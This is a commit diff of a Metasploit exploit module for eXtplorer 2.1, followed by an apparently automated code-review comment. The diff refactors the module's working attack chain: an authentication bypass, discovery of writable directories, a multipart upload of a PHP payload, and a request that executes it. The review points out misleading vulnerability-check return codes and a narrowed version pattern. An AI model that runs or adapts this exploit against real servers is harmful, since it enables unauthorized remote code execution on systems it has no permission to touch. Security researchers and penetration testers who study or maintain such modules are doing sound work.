extplorer_upload_exec cleanup
parent
8f91352c4a
commit
52157b9124
|
@ -30,16 +30,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '88751' ],
|
||||
[ 'BID', '57058' ],
|
||||
[ 'URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability' ],
|
||||
[ 'URL', 'http://extplorer.net/issues/105' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00"
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => "none"
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
@ -71,9 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "#{base}extplorer.xml"
|
||||
})
|
||||
|
||||
return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /<version>2\.1\.(0RC5|0|1|2)<\/version>/
|
||||
return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/
|
||||
if !res or res.code != 200
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
if res.body =~ /<version>2\.1\.0RC[012]<\/version>/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
if res.body =~ /eXtplorer/
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{peer} - Connection failed")
|
||||
end
|
||||
|
@ -92,29 +98,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def upload(base, dir, fname, file)
|
||||
|
||||
boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
|
||||
data_post = "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"userfile[0]\"; filename=\"#{fname}\"\r\n"
|
||||
data_post << "Content-Type: application/x-httpd-php\r\n"
|
||||
data_post << "\r\n#{file}\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n%2f#{dir}\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part(file, 'application/x-httpd-php', nil, "form-data; name=\"userfile[0]\"; filename=\"#{fname}\"")
|
||||
data.add_part("on", nil, nil, "form-data; name=\"overwrite_files\"")
|
||||
data.add_part("%2f#{dir}", nil, nil, "form-data; name=\"dir\"")
|
||||
data.add_part("com_extplorer", nil, nil, "form-data; name=\"option\"")
|
||||
data.add_part("upload", nil, nil, "form-data; name=\"action\"")
|
||||
data.add_part("xmlhttprequest", nil, nil, "form-data; name=\"requestType\"")
|
||||
data.add_part("true", nil, nil, "form-data; name=\"confirm\"")
|
||||
|
||||
data_post = data.to_s
|
||||
data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{base}index.php",
|
||||
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data_post,
|
||||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
|
@ -149,8 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
|
||||
print_status("#{@peer} - Authenticated successfully")
|
||||
else
|
||||
print_error("#{@peer} - Authentication failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
|
||||
end
|
||||
|
||||
# search for writable directories
|
||||
|
@ -163,8 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
|
||||
dir = "#{base}#{$1}"
|
||||
|
@ -182,12 +179,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
|
||||
print_good("#{@peer} - File uploaded successfully")
|
||||
else
|
||||
print_error("#{@peer} - Uploading PHP payload failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
|
||||
# search directories in the web root for the file
|
||||
|
@ -200,8 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
|
||||
dir = $1.gsub('\\','')
|
||||
|
@ -218,8 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "/#{dir}/#{@fname}"
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
if res and res.code != 200
|
||||
print_error("#{@peer} - Executing payload failed")
|
||||
|
|
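Review bot: In the `check` hunk (`-71,9 +68,18`), the multi-line branches, which the hunk counts suggest are the new side, return `Exploit::CheckCode::Safe` in two cases that do not show the target is unaffected. For a missing or non-200 response, `return Exploit::CheckCode::Unknown` is more accurate, and for a body that matches `/eXtplorer/` without a version match, `return Exploit::CheckCode::Detected` avoids giving an assessment a false all-clear. The version pattern also appears to narrow from `2\.1\.(0RC5|0|1|2)` to `2\.1\.0RC[012]`, so releases the earlier one-line check reported as vulnerable would no longer match; confirm the affected range against the referenced advisory. The `rescue` path, and a 200 body matching neither pattern, still seem to fall through without returning a CheckCode, though the method starts and ends outside the hunk. Separately, in `upload`, the `gsub(/^\r\n\-\-\_Part\_/, ...)` uses `^`, which matches at every line start; `\A` would limit it to the start of the string if only the leading CRLF is meant to be trimmed.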